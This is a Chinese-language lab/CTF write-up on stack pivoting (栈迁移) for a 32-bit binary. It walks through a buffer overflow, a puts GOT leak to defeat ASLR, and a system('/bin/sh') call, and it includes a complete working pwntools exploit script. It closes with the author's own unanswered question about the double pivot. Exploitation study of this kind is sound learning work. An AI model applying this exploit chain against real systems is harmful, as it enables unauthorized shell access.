check一下,开了NX
image.png
拖进ida
image.png
发现栈溢出,read读取0x40个字节到buf0x28的空间中,会溢出0x12个字节,可以用来构造的paylode长度就很有限,不足以写进rop,所以我们要进行栈迁移。
栈迁移:
通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上
leave = mov esp,ebp ; pop ebp;
0x804a000 0x804b000 rw-p 1000 1000 /home/yoona/Desktop/lab/6migration
先将栈劫持到bss段
payload = 'a'*0x28
payload += p32(bss1) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss1) + p32(0x100)
再通过puts函数泄露出libc的内存信息
泄露地址的同时要将栈迁移到另一个我们能控制的地方
payload = p32(bss2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss2) + p32(0x100)
p.send(payload)
puts_addr =u32(p.recv(4))
print "puts_addr:"+hex(puts_addr)
offset = puts_addr - puts_libc
system_addr = system_libc + offset
binsh = binsh_libc +offset
执行system
payload = p32(bss1) + p32(system_addr) + "bbbb" + p32(binsh)
p.send(payload)
p.interactive()
脚本:
#!/usr/bin/python
# -*- coding:utf-8 -*-S
from pwn import *
context.log_level = 'debug'
p = process('./6migration')
elf = ELF("./6migration")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
system_libc = libc.symbols["system"]
print "system_libc:"+hex(system_libc)
read_plt = elf.plt["read"]
print "read_plt:"+hex(read_plt)
puts_got = elf.got["puts"]
print "puts_got:"+hex(puts_got)
puts_plt = elf.plt["puts"]
print "puts_plt:"+hex(puts_plt)
puts_libc = libc.symbols["puts"]
print "puts_libc:"+hex(puts_libc)
binsh_libc= libc.search("/bin/sh").next()
print "binsh_libc:"+hex(binsh_libc)
bss1 = elf.bss() + 0x500
bss2 = elf.bss() + 0x400
pop_ebx = 0x0804836d
leave_ret = 0x08048418
payload = 'a'*0x28
payload += p32(bss1) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss1) + p32(0x100)
p.recvuntil(" :\n")
p.send(payload)
payload = p32(bss2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss2) + p32(0x100)
p.send(payload)
puts_addr =u32(p.recv(4))
print "puts_addr:"+hex(puts_addr)
offset = puts_addr - puts_libc
system_addr = system_libc + offset
binsh = binsh_libc +offset
payload = p32(bss1) + p32(system_addr) + "bbbb" + p32(binsh)
#payload = p32(0) + p32(system_addr) + "bbbb" + p32(binsh)
p.send(payload)
p.interactive()
不明白为什么要迁移两次,而且不明白两次的地址是怎么来的
